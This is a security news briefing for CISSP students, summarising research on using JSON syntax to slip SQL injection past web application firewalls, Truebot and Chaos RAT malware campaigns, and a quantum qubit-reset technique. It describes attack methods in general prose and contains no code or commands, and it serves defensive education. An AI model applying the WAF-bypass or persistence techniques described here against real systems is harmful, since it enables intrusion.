Les Bell

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

JSON Allows SQL Injection to Bypass Web Application Firewalls

Claroty's Team82 has developed a generic technique which allowed them to bypass web application firewalls while delivering SQL injection payloads.

SQL injection remains one of the leading vulnerabilities in web applications, in large part due to the constant demand for web developers who, without proper security education, copy code fragments from sites like Stack Overflow without realising that the code fragments are just that - fragments intended to demonstrate a technique, and not fully-formed code ready to be copied and pasted into your finished application code (a 2018 study suggested that roughly 50% of answers to PHP questions contain SQL injection vulnerabilities).

The correct fix, of course, is to educate developers, but in the meantime most users depend on web application firewalls, which can detect and block a range of attacks on web applications. However, the technique developed by Team82 works by prepending JSON syntax to the SQL injection payloads - and because many WAF's lack JSON support (even though databases added JSON support many years ago) this threw the parser component of the WAF for a loop, allowing the SQL injection to pass.

The technique worked on all but one WAF the researchers tested, and after they notified the vendors, their products have had JSON support added. The Team82 researchers also added support for the technique to the popular SQLMap open-source exploitation tool, for use by penetration testers.

Moshe, Noam, {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF, blog post, 8 December 2022. Available online at https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf.

Laurent22, Potential SQL injections vulnerabilities in Stack Overflow PHP questions, automated analysis report, July 2018. Available online at https://laurent22.github.io/so-injections/.

New Waves of Truebot Attacks

Cisco Talos security researchers are reporting an increase in infections by Truebot (also known as Silence.Downloader). Previously, Truebot has been spread via malmails and mainly infected desktop/laptop systems inside corporate networks. The new wave is using two new initial infection mechanisms.

In August, the researchers noticed a small number of cases in which Truebot was run following the exploitation of a vulnerability in the IT asset management product Netwrix Auditor. However, since this tool is not widely used on Internet-facing systems, this remained a limited infection. However, in October a second wave of infection started, this time delivered via Raspberry Robin malware, which usually spreads via USB drives. Between them, these two infections have assembled a botnet of over 1,000 systems worldwide, with a particular focus on Mexico, Brazil and Pakistan. Since November, the attackers have switched to an as-yet-unknown delivery mechanism which has infected over 500 Internet-facing Windows servers in the US, Cana and Brazil.

Post-compromise, the current versions of Truebot download either Cobalt Strike reverse shell or Grace malware payloads, typically followed by a custom 'Teleport' exfiltration tool. However, in some cases, the threat actors go on to deploy Clop ransomware as part of a double extortion attack.

These campaigns seem to involve two different groups: Silence Group, who are originally responsible for Truebot, and TA505, a.k.a. Evil Corp, who are associated with the Grace malware.

Pereira, Tiago, Breaking the silence - Recent Truebot activity, threat advisory, 8 December 2022. Available online at https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/.

Linux Servers Targeted for Cryptomining and More With Chaos RAT

For some time, cryptojacking threat groups have been targeting Linux instances in the cloud, generally using the same sequence of actions after gaining initial access: kill off any competing malware and security products, establish persistence and then execute a Monero cryptominer. But in November Trend Micro researchers observed a new pattern of activity: in this case, a remote access trojan called Chaos (Trojan.Linux.CHAOSRAT) is installed along with the XMRig miner.

The infection ensures persistence by setting up a cron job which will keep downloading and reinstalling itself from Pastebin every 10 minutes, and also installs itself in different locations to further evade removal. The other payload download C2 server is hosted in Russia, but once the Chaos RAT is installed, it connects to a C2 server which appears to be in Hong Kong, reporting detailed configuration of the infected machine.

The RAT is written in Go and has quite comprehensive capabilities: it can provide a reverse shell, upload, download and delete files, take screenshots, restart or shut down the computer. This suggests that this threat actor is considering broadening their activities from just cloud-based cryptomining.

Fiser, David and Alfredo Oliveira, Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT, blog post, 12 December 2022. Available online at https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html.

UNSW Resets Qbits With Maxwell's Daemon

A story that slipped under our radar for a while: Every student who studies thermodynamics encounters Maxwell's Daemon, a thought-experiment daemon which, by opening a door between two chambers when a highly-excited particle approaches it and closing the door to slow ones, can create a temperature difference between the two, thereby driving a heat engine and achieving - in theory - perpetual motion. Such a daemon is impossible, of course - the daemon itself needs to consume energy to observe the particles and move the door.

But in a modern twist on the idea, quantum computing engineers at University of New South Wales have achieved something similar, using a fast digital voltmeter to observe the temperature of electrons drawn from a warm pool of electrons. In doing so, they make the electron much cooler than the pool it came from, which corresponds to it being in the '0' state.

This is the basis of their new technique for resetting the state of electron spin silicon qubits. The old technique works by cooling electrons to a temperature near absolute zero, and hoping that all the electrons 'relax' to the '0' state, but this still leaves a 20% probability that the electron will be a '1'. The new technique reduces the probability of error to 1% - a major step in improving the reliability of quantum computers.

UNSW Media, New quantum computing feat is a modern twist on a 150-year-old thought experiment, news release, 30 November 2022. Available online at https://newsroom.unsw.edu.au/news/science-tech/new-quantum-computing-feat-modern-twist-150-year-old-thought-experiment.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.